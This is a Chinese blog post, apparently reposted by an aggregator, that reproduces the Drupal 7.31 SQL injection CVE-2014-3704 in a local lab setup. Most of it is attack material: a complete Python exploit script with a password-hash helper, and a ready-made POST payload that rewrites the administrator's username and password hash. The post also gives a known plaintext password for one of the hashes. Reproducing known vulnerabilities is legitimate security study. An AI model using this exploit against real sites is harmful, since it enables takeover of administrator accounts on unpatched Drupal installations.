[CVE-2014-3704]Drupal 7.31 SQL注入漏洞分析与复现
Posted 浪迹天涯adislj
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[CVE-2014-3704]Drupal 7.31 SQL注入漏洞分析与复现相关的知识,希望对你有一定的参考价值。
记录下自己的复现思路
漏洞影响:
Drupal 7.31
Drupal是一个开源内容管理平台,为数百万个网站和应用程序提供支持。
0x01漏洞复现
复现环境:
1) Apache2.4
2) php 7.0
3) drupal 7.31 https://www.drupal.org/drupal-7.31-release-notes(点击下载)
环境打包在目录下安装即可
中间遇到的问题:
解决方法:关闭extersion=php_mbstring.dll(修改前注意备份原来的)
Exploit:
原先管理员帐号:root 密码:rootxxxx
import urllib2,sys from drupalpass import DrupalHash host = sys.argv[1] user = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 3: print "host username password" print "http://nope.io admin wowsecure" hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash() target = \'%s/?q=node&destination=node\' % host post_data = "name[0%20;update+users+set+name%3d\\\'" \\ +user \\ +"\'+,+pass+%3d+\'" \\ +hash[:55] \\ +"\'+where+uid+%3d+\\\'1\\\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in" content = urllib2.urlopen(url=target, data=post_data).read() if "mb_strlen() expects parameter 1" in content: print "Success!\\nLogin now with user:%s and pass:%s" % (user, password) import hashlib # Calculate a non-truncated Drupal 7 compatible password hash. # The consumer of these hashes must truncate correctly. class DrupalHash: def __init__(self, stored_hash, password): self.itoa64 = \'./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\' self.last_hash = self.rehash(stored_hash, password) def get_hash(self): return self.last_hash def password_get_count_log2(self, setting): return self.itoa64.index(setting[3]) def password_crypt(self, algo, password, setting): setting = setting[0:12] if setting[0] != \'$\' or setting[2] != \'$\': return False count_log2 = self.password_get_count_log2(setting) salt = setting[4:12] if len(salt) < 8: return False count = 1 << count_log2 if algo == \'md5\': hash_func = hashlib.md5 elif algo == \'sha512\': hash_func = hashlib.sha512 else: return False hash_str = hash_func(salt + password).digest() for c in range(count): hash_str = hash_func(hash_str + password).digest() output = setting + self.custom64(hash_str) return output def custom64(self, string, count = 0): if count == 0: count = len(string) output = \'\' i = 0 itoa64 = self.itoa64 while 1: value = ord(string[i]) i += 1 output += itoa64[value & 0x3f] if i < count: value |= ord(string[i]) << 8 output += itoa64[(value >> 6) & 0x3f] if i >= count: break i += 1 if i < count: value |= ord(string[i]) << 16 output += itoa64[(value >> 12) & 0x3f] if i >= count: break i += 1 output += itoa64[(value >> 18) & 0x3f] if i >= count: break return output def rehash(self, stored_hash, password): # Drupal 6 compatibility if len(stored_hash) == 32 and stored_hash.find(\'$\') == -1: return hashlib.md5(password).hexdigest() # Drupal 7 if stored_hash[0:2] == \'U$\': stored_hash = stored_hash[1:] password = hashlib.md5(password).hexdigest() hash_type = stored_hash[0:3] if hash_type == \'$S$\': hash_str = self.password_crypt(\'sha512\', password, stored_hash) elif hash_type == \'$H$\' or hash_type == \'$P$\': hash_str = self.password_crypt(\'md5\', password, stored_hash) else: hash_str = False return hash_str
我这里编译不成功,打算换一种方法
http://127.0.0.1/drupal-7.31/node?destination=node
点击 login 这里post修改查询语句,插入update的sql语句直接更改管理员帐号密码。
这里的加密方式调用官方的password-hash.sh 去生成自己的hash
这里报错了。
找了两个网上的公开的hash去update 。
$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld ---->thanks
$S$CTo9G7Lx2mJrSyWmlh3NRTXL6AWJt35fzep9obyjkwezMHOgQf.s --->P@55w0rd.
Payload:
name[0%20;update+users+set+name%3d\'owned\'+,+pass+%3d+\'$S$CTo9G7Lx2mJrSyWmlh3NRTXL6AWJt35fzep9obyjkwezMHOgQf.s\'+where+uid+%3d+\'1\';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
直接update用户:owned 密码:P@55w0rd
从数据库查询回来的结果或者mysql的监控可以看到,管理员的用户名和密码都被重置。owned用户提升为管理员,并且密码设为P@55w0rd。
ref:
- http://0day5.com/archives/2310/
- http://www.freebuf.com/vuls/47690.html
以上是关于[CVE-2014-3704]Drupal 7.31 SQL注入漏洞分析与复现的主要内容,如果未能解决你的问题,请参考以下文章
Drupal:drupal_set_message 不显示消息